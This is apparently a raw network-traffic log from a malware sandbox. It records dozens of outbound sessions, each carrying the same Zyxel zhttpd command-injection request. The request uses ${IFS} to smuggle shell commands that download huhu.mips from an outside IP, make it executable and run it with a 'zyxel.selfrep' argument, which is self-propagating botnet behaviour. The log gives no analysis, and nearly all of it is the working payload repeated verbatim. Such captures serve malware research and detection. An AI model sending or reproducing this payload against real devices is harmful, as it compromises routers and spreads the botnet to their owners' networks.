                                              Jan 29, 2024 07:03:02.558824062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              481192.168.2.1459234218.199.245.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558876038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              482192.168.2.1433874119.145.225.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558912992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              483192.168.2.1440188136.177.143.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558934927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              484192.168.2.1441066156.160.221.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.558975935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              485192.168.2.1450210196.31.2.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559019089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              486192.168.2.144810467.72.234.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559047937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              487192.168.2.1454712121.55.35.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559067011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              488192.168.2.145184663.14.129.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559091091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              489192.168.2.145506687.48.241.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559135914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              490192.168.2.1452834139.253.252.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559158087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              491192.168.2.1446272187.42.102.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559197903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              492192.168.2.144897441.164.214.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559235096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              493192.168.2.1451872151.11.80.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559299946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              494192.168.2.1458670212.57.121.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559341908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              495192.168.2.145318612.161.40.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559400082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              496192.168.2.143716031.161.31.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559425116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              497192.168.2.145918885.55.142.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559472084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              498192.168.2.1439436132.204.166.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559506893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              499192.168.2.1459086197.2.54.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559525967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              500192.168.2.145017442.102.136.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559539080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              501192.168.2.144889038.149.233.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559588909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              502192.168.2.144762413.82.178.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559633017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              503192.168.2.143621060.28.235.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559675932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              504192.168.2.1453654104.52.134.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559710979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              505192.168.2.1449208113.212.218.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559732914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              506192.168.2.1454854192.23.95.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559777975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              507192.168.2.1454732119.58.135.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559845924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              508192.168.2.1446740194.216.41.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559883118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              509192.168.2.145885445.246.93.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559911966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              510192.168.2.1460260192.36.137.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559947968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              511192.168.2.1448430105.151.66.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.559993982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              512192.168.2.143800061.84.0.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560003042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              513192.168.2.144547279.149.100.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560029984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              514192.168.2.1435852157.42.60.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560067892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              515192.168.2.145005099.161.231.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560107946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              516192.168.2.1455804187.140.13.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560159922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              517192.168.2.1438328128.214.76.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560193062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              518192.168.2.1460394150.145.10.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560236931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              519192.168.2.1443244106.230.99.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560286999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              520192.168.2.145952870.63.195.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560319901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              521192.168.2.1440694182.121.213.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560343981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              522192.168.2.1455350146.76.46.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560360909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              523192.168.2.146045881.210.3.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560400009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              524192.168.2.1447108116.43.70.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560416937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              525192.168.2.1437630206.122.4.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560448885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              526192.168.2.1438440212.23.8.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560501099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              527192.168.2.145897063.98.176.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560534000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              528192.168.2.1448206164.59.73.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560535908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              529192.168.2.143908853.83.54.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560599089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              530192.168.2.144819693.47.111.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560643911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              531192.168.2.1444656183.171.175.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560683966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              532192.168.2.144207857.170.148.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560697079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              533192.168.2.144681024.156.23.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.560740948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              534192.168.2.145131854.28.88.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568011045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              535192.168.2.143490451.118.27.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568047047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              536192.168.2.143885071.191.152.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568090916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              537192.168.2.1447554144.95.167.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568109989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              538192.168.2.14576308.48.231.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568134069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              539192.168.2.1458044131.93.153.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568196058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              540192.168.2.1439706181.97.25.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568265915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              541192.168.2.1459204111.178.85.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568322897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              542192.168.2.144070283.127.239.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568336010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              543192.168.2.143362897.132.87.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:03.568469048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              544192.168.2.1435550210.24.190.113443
                                              TimestampBytes transferredDirectionData
